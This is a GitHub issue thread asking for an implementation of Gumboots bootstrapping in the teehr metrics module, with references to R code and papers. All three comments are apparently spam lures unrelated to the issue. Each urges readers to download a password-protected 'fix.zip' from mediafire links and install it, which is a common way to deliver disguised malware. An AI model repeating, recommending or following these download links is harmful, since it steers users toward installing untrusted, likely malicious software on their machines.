### ISSUE TITLE
Implement GumBoots bootstrapping 

### ISSUE THREAD

**Issue by samlamont** [RTIInternational/teehr#237]
The framework for an implementation of Gumboots bootstrapping currently exists in `teehr/metrics/gumboots_bootstrap.py`

The  goal of this issue is to implement the Gumboots sampling strategy within the current framework.

References:
* R code: https://github.com/cran/gumboot/blob/master/R/bootjack.R
* https://cran.r-project.org/web/packages/gumboot/gumboot.pdf
* https://github.com/CH-Earth/gumboot
* https://agupubs.onlinelibrary.wiley.com/doi/full/10.1029/2020WR029001

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
